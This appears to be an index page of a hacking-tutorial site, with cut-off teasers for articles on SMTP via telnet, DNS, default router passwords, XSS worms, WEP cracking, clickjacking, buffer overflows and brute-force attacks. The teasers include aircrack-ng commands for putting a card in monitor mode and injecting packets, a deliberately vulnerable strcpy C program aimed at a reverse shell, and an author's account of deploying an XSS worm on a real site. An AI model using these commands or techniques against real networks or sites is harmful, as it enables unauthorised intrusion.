Understanding SMTP and how to send emails via Telnet.

    Understanding SMTP and how to send emails via Telnet.                                             This text explains how one can telnet do an SMTP server, and use that server to their advantage via commandline. ...
MY LOGO ...

DNS

Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there...

Default usernames and password

   Default usernames and passwords for                                                                   Routers/Switches/Hubs    ...

XSS worms

XSS worms XSS worms are pretty neat, interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how it was affective, and what challenges I faced. The worm I created was in Justin.Tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and it's up to many...

10 Easy Steps to Crack a Wireless WEP

10 Easy Steps to Crack a Wireless WEP Key 128 bit using Ubuntu 7.10 using Aircrack-ng Tools This is my First Tutorial 1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode) 2)sudo wlanconfig ath0 destroy 3)sudo ifconfig ath1 up (makes ur ath1 interface up) 4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11) 5)sudo aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 ath1...

ClickJacking

ClickJacking -[ INFOS ]----------------------------------------------------------------------- Title: "The Clickjacking meets XSS: a state of art" --------------------------------------------------------------------------------- -[ SUMMARY ]---------------------------------------------------------------------     0x01: Introduction     0x02: What is the Problem     0x03: JavaScript always loves...

Buffer Overflow Tutorial

-- Buffer Overflow Tutorial --  Hi we are going to do a basic stack overflow on a vulnerable program to get a reverse shell I apoligise for my english..it's not my native language Our vulnerable program: -- vuln-prog.c #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *string) {   char buffer[1024];   strcpy(buffer, string);   return 1; } int main(int argc, char *argv[])...

Analysis of brute force & dictionary attacks

.-::Analysis of brute force & dictionary attacks.::-. [ 0x00 ] Chapters ================================================ [ 0x01 ] Prologue [ 0x02 ] Terms & Conventions [ 0x03 ] Tools, Environment & Prerequisites [ 0x04 ] Basic Theory [ 0x05 ] ASCII Codes [ 0x06 ] Hashes [ 0x07 ] Brute Force Attack [ 0x08 ] Theory [ 0x09 ] Source Code Analysis [ 0x0a ] Dictionary Attack [ 0x08 ] Theory [ 0x09 ] Source Code Analysis [ 0x0d...